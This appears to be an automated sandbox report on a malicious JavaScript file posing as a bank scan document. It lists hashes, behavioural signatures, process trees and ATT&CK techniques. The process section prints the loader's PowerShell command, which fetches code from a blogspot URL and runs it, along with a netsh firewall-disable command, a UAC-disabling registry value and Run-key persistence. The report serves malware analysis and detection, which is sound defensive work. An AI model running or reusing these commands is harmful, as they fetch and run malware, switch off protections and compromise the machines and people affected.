Analysis
-
max time kernel
143s -
max time network
271s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
16-01-2024 10:45
Static task
static1
Behavioral task
behavioral1
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win11-20231222-en
General
-
Target
New_ScanDoc#092387CHASEeAdvice.js
-
Size
1.4MB
-
MD5
286d534eb759c671fa9e79cfafd3bc85
-
SHA1
d165938c1c607618c5cb6d9d11cf5b371f007ac7
-
SHA256
77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
-
SHA512
3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
-
SSDEEP
192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 9 1148 powershell.exe 11 1148 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation wscript.exe -
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deissl1 = "schtasks /run /tn Deissl1" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 27 api.ipify.org 28 api.ipify.org 30 ip-api.com -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 1148 set thread context of 2648 1148 powershell.exe RegSvcs.exe PID 1148 set thread context of 1768 1148 powershell.exe RegSvcs.exe PID 1148 set thread context of 1168 1148 powershell.exe Msbuild.exe -
Drops file in Windows directory 1 IoCs
Processes:
dw20.exedescription ioc process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dw20.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
dw20.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Modifies registry class 3 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exeRegSvcs.exepid process 1148 powershell.exe 1148 powershell.exe 1148 powershell.exe 1148 powershell.exe 1148 powershell.exe 1148 powershell.exe 2648 RegSvcs.exe 2648 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeRegSvcs.exedw20.exedescription pid process Token: SeDebugPrivilege 1148 powershell.exe Token: SeDebugPrivilege 2648 RegSvcs.exe Token: SeRestorePrivilege 408 dw20.exe Token: SeBackupPrivilege 408 dw20.exe Token: SeBackupPrivilege 408 dw20.exe Token: SeBackupPrivilege 408 dw20.exe Token: SeBackupPrivilege 408 dw20.exe Token: SeIncreaseQuotaPrivilege 1148 powershell.exe Token: SeSecurityPrivilege 1148 powershell.exe Token: SeTakeOwnershipPrivilege 1148 powershell.exe Token: SeLoadDriverPrivilege 1148 powershell.exe Token: SeSystemProfilePrivilege 1148 powershell.exe Token: SeSystemtimePrivilege 1148 powershell.exe Token: SeProfSingleProcessPrivilege 1148 powershell.exe Token: SeIncBasePriorityPrivilege 1148 powershell.exe Token: SeCreatePagefilePrivilege 1148 powershell.exe Token: SeBackupPrivilege 1148 powershell.exe Token: SeRestorePrivilege 1148 powershell.exe Token: SeShutdownPrivilege 1148 powershell.exe Token: SeDebugPrivilege 1148 powershell.exe Token: SeSystemEnvironmentPrivilege 1148 powershell.exe Token: SeRemoteShutdownPrivilege 1148 powershell.exe Token: SeUndockPrivilege 1148 powershell.exe Token: SeManageVolumePrivilege 1148 powershell.exe Token: 33 1148 powershell.exe Token: 34 1148 powershell.exe Token: 35 1148 powershell.exe Token: 36 1148 powershell.exe Token: SeIncreaseQuotaPrivilege 1148 powershell.exe Token: SeSecurityPrivilege 1148 powershell.exe Token: SeTakeOwnershipPrivilege 1148 powershell.exe Token: SeLoadDriverPrivilege 1148 powershell.exe Token: SeSystemProfilePrivilege 1148 powershell.exe Token: SeSystemtimePrivilege 1148 powershell.exe Token: SeProfSingleProcessPrivilege 1148 powershell.exe Token: SeIncBasePriorityPrivilege 1148 powershell.exe Token: SeCreatePagefilePrivilege 1148 powershell.exe Token: SeBackupPrivilege 1148 powershell.exe Token: SeRestorePrivilege 1148 powershell.exe Token: SeShutdownPrivilege 1148 powershell.exe Token: SeDebugPrivilege 1148 powershell.exe Token: SeSystemEnvironmentPrivilege 1148 powershell.exe Token: SeRemoteShutdownPrivilege 1148 powershell.exe Token: SeUndockPrivilege 1148 powershell.exe Token: SeManageVolumePrivilege 1148 powershell.exe Token: 33 1148 powershell.exe Token: 34 1148 powershell.exe Token: 35 1148 powershell.exe Token: 36 1148 powershell.exe Token: SeIncreaseQuotaPrivilege 1148 powershell.exe Token: SeSecurityPrivilege 1148 powershell.exe Token: SeTakeOwnershipPrivilege 1148 powershell.exe Token: SeLoadDriverPrivilege 1148 powershell.exe Token: SeSystemProfilePrivilege 1148 powershell.exe Token: SeSystemtimePrivilege 1148 powershell.exe Token: SeProfSingleProcessPrivilege 1148 powershell.exe Token: SeIncBasePriorityPrivilege 1148 powershell.exe Token: SeCreatePagefilePrivilege 1148 powershell.exe Token: SeBackupPrivilege 1148 powershell.exe Token: SeRestorePrivilege 1148 powershell.exe Token: SeShutdownPrivilege 1148 powershell.exe Token: SeDebugPrivilege 1148 powershell.exe Token: SeSystemEnvironmentPrivilege 1148 powershell.exe Token: SeRemoteShutdownPrivilege 1148 powershell.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
wscript.exepowershell.execsc.exeMsbuild.exedescription pid process target process PID 1116 wrote to memory of 1148 1116 wscript.exe powershell.exe PID 1116 wrote to memory of 1148 1116 wscript.exe powershell.exe PID 1148 wrote to memory of 4188 1148 powershell.exe csc.exe PID 1148 wrote to memory of 4188 1148 powershell.exe csc.exe PID 4188 wrote to memory of 4588 4188 csc.exe cvtres.exe PID 4188 wrote to memory of 4588 4188 csc.exe cvtres.exe PID 1148 wrote to memory of 808 1148 powershell.exe netsh.exe PID 1148 wrote to memory of 808 1148 powershell.exe netsh.exe PID 1148 wrote to memory of 2648 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 2648 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 2648 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 2648 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 2648 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 2648 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 2648 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 2648 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 1768 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 1768 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 1768 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 1768 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 1768 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 1768 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 1768 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 1768 1148 powershell.exe RegSvcs.exe PID 1148 wrote to memory of 1168 1148 powershell.exe Msbuild.exe PID 1148 wrote to memory of 1168 1148 powershell.exe Msbuild.exe PID 1148 wrote to memory of 1168 1148 powershell.exe Msbuild.exe PID 1148 wrote to memory of 1168 1148 powershell.exe Msbuild.exe PID 1148 wrote to memory of 1168 1148 powershell.exe Msbuild.exe PID 1148 wrote to memory of 1168 1148 powershell.exe Msbuild.exe PID 1148 wrote to memory of 1168 1148 powershell.exe Msbuild.exe PID 1148 wrote to memory of 1168 1148 powershell.exe Msbuild.exe PID 1168 wrote to memory of 408 1168 Msbuild.exe dw20.exe PID 1168 wrote to memory of 408 1168 Msbuild.exe dw20.exe PID 1168 wrote to memory of 408 1168 Msbuild.exe dw20.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 62⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4a3dkgcd\4a3dkgcd.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7639.tmp" "c:\Users\Admin\AppData\Local\Temp\4a3dkgcd\CSCA1C908A7EDF046C88043681E4A51E7A5.TMP"4⤵PID:4588
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
PID:808 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵PID:1768
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:408
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5b215617f60edf485138fed3ebe41c74d
SHA19c780185d017e67e54db1376267e13cc08b83526
SHA2561c778635f38da4179544176b8637e6032171f46aef27f072de08ee69692db27b
SHA51214cd36283e9686927db4f78bbf8e3c17dd4aea206ada1a4b8a44034811be3700101e51945b6140c553cd10edf7ea65e75a00428b1389401f719f1b14450979e1
-
Filesize
1KB
MD51bde72f5b19daffd3ab768be69d20b0f
SHA1cd8cf78cd0ab524d4028b27e3ae95538372f1b4f
SHA2563bc57bbeb13d1c924120d9a861e82f3684b4d8a03b4923d6ef0e3eac37958b2e
SHA512c27193af67605c750ec12af9e563799326eb8a5c28e6902d7658564800b8137f4e4e03f714a7677f514f191413a573a9c7b8b97e18b5f4e562d9b93c58d70d43
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
Filesize
369B
MD5147f840e180ed7532f849aaf30701b10
SHA1a8a114444fc3d77e6b43129800baf36edcecc618
SHA2568f41cb45288cb64dc8205f78a2071548d48aab5f18d18d57f3aae790b85559cd
SHA5126073df516bf4f9f257e2aba1207acfbd5b56a113fe936eb45622f45f8e01236c5958c39160a0897e8f4c32e9a25c2992430962fe28f96f8ccda3decccb639345
-
Filesize
652B
MD515a0a7667b44fdea46578ba7bfbdc1ef
SHA146b3adc8d7c21158cd38f323ac5b3da946f4575f
SHA2564a9a9d6f6aec25a3d628438e677952bdd9f399857b00b0cf2927f80ae369dfe3
SHA51221a85a8e15ab363fd8b862950938fab01e80abef57d19a6aca61c04be9934943f346990ad234a67c97165bca72bdbd5ecf0c9123778a22a61a887ae047e045f4